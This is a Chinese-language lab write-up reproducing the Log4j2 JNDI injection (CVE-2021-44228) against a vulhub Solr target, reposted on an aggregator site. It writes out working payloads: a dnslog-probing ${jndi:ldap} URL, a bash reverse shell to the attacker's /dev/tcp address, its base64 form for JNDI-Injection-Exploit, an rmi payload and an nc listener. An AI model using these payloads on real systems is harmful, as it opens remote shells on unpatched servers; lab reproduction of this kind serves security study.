log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)

这篇具有很好参考价值的文章主要介绍了log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言:
Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。
2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。

受影响版本:
Apache Log4j 2.x <= 2.14.1

正文:
环境搭建:
依托vulhub靶场搭建环境,漏洞启动目录:

/vulhub-master/log4j/CVE-2021-44228

启动命令:

docker-compose up -d

启动成功后访问地址:http://192.168.0.110:8983/solr/#/
IP换成你自己的靶机IP即可
搭建效果:
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全漏洞复现:
首先我们需要准备一台kali
工具用到的是大佬开发的exp

https://github.com/bkfish/Apache-Log4j-Learning/

这里我们直接下载到kali中也可以,工具具体目录在文件中的tools目录下
我们直接开始演示
先利用dnslog生成一个用于接收回参的网址
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全然后我们对目标网站进行测试,访问网址:

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:ldap://4wuy7v.dnslog.cn}

同样是换成你自己的IP和生成的dnslog值即可
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全我们等十秒点击第一个箭头处的刷新就可以看到回显,ok这里可以利用
我们继续下一步,进行nc的反弹shell
首先到kali中打开我们事先准备好的exp
解压后到tools目录下
构造payload:

bash -i >& /dev/tcp/192.168.0.106/6969 0>&1

这里IP是kali的IP,端口是你等会nc监听的端口
然后我们将这个加密为base64
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全直接使用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.106

这里echo后面就是你加密之后的值,最后面的IP还是kali的IP,回车启动
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全这里会生成两个协议各一个执行命令,这两个协议在log4j2中都有执行权限
我们使用第一个,再次构造一个payload

${jndi:rmi://192.168.0.106:1099/sm0syp}

到kali中开启nc

nc -lvvp 6969

log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全然后我们将这个payload插入到action的后面

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:rmi://192.168.0.106:1099/sm0syp}

回车直接访问
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全再次回到kali中我们可以看到nc成功反弹shell
log4j2 漏洞复现 ,漏洞的位置在 cd vulhub-master/log4j/cve-2021-44228,笔记,安全,linux,运维,网络安全

裙:70844080
vx gzh:白安全组
作者:【白】

参考文章:文章来源地址https://www.toymoban.com/news/detail-524281.html

https://blog.csdn.net/m0_56773673/article/details/122300927?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165236333216781483782069%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165236333216781483782069&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-5-122300927-null-null.142^v9^control,157^v4^control&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187
https://blog.csdn.net/weixin_43795682/article/details/123557217?ops_request_misc=&request_id=&biz_id=102&utm_term=vukhub%E9%9D%B6%E5%9C%BAlog4j2%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-3-123557217.142^v9^control,157^v4^control&spm=1018.2226.3001.4187

到了这里,关于log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址: ysoserial 利用工具生成payload: 1.创建文件 进入容器内部,查看文件创建成功 2.查看反弹的shell 有点

    2024年02月11日
    浏览(46)
  • Log4j2远程命令执行(CVE-2021-44228)

    2.0 = Apache Log4j2= 2.14.1 启动服务后,进入主页面,点击页面中的???链接,跳转到,目标地址。 首先使用dnslog进行测试,是否存在jndi注入的点,再ceyedns平台接收到了反馈的消息,发现此处存在jndi注入。 如果payload没有进行url编码,可能会导致后台无法解析,最好的方式就是

    2024年02月04日
    浏览(51)
  • log4j2漏洞原理和漏洞环境搭建复现

    目录 1.背景 1.1影响版本 2.漏洞原理 2.1JNDI是什么 2.2LDAP是什么 2.3JNDI注入原因 2.4 log4j2是什么 3.漏洞复现 3.1准备工作 3.1.1准备恶意代码 3.1.2将恶意代码放到网站目录下 3.1.3 LDAP服务器端 3.1.4客户端搭建 3.1.5 执行代码  4.注意事项 部分资源在文章最后百度网盘 2021年11月24日,阿里

    2024年02月05日
    浏览(37)
  • CVE-2021-44228 Apache log4j 远程命令执行漏洞

    一、漏洞原理 log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,

    2024年02月08日
    浏览(52)
  • Log4j2 反序列化漏洞与复现

    Log4j → Log for Java ,Apache的开源日志记录组件 JDK →1.8u21以下的版本 CVE-2021-44228 远程代码执行 →2.15.0修复 CVE-2021-45046 拒绝服务Dos →2.16.0修复 CVE-2021-45105 拒绝服务Dos →2.17.0修复 CVE-2021-44832 远程代码执行 →2.17.1修复 Log4j为了输出日志时能输出任意位置的Java对象,引入了Looku

    2024年02月05日
    浏览(50)
  • log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)

    啥是log4j2? log4j2是apache下的java应用常见的开源日志库,是一个就Java的日志记录工具。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。 啥是JNDI? 由

    2024年02月06日
    浏览(85)
  • log4j2漏洞分析

    和前面的JNDI注入时用的代码差不多 如果要引入log4j2的jar包可以这么配置Maven的pom.xml 还要创建个配置文件 log4j2这个漏洞当时爆出来的时候堪称是核弹级别的,危害非常大,利用还非常简单,既然如此,那我们肯定要分析一下漏洞相关的原理来学习一下 这个漏洞是个JNDI注入漏

    2024年02月09日
    浏览(47)
  • Java代码审计15之Apache log4j2漏洞

    2.1、高版本测试 先说结论,ldap协议, rmi协议 还有就是“ “${jndi:rmi://127.0.0.1:7778/exp}” ” 2.2、测试代码 先引入组件, main.java jndiexp.java 2.3、补充之dns探测 2.3.1、rmi、ldap也可以dnslog探测 在使用dnslog探测漏洞的时候, 其实不仅仅dns协议可以,ldap和rmi协议也可以, 类似的rmi,

    2024年02月10日
    浏览(43)
  • Log4j2的Configuration详解

    官方配置文档: https://logging.apache.org/log4j/2.x/manual/filters.html 根节点 Configuration 参数介绍: Attribute Name Description name The name of the configuration. monitorInterval Log4j has the ability to automatically detect changes to the configuration file and reconfigure itself。 即动态加载,单位是秒。可自定义配置,最小

    2023年04月09日
    浏览(41)
  • springboot 日志管理之 log4j2

    1、log4j2 简介         Apache Log4j2是对Log4j的升级,它比其前身Log4j 1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Logback架构中的一些问题。 被誉为是目前最优秀的Java日志框架。 2、项中引入 log4j2 的方式 2.1、springboot 项目中 2.2、普通 java 项目中 3、在项

    2024年01月15日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包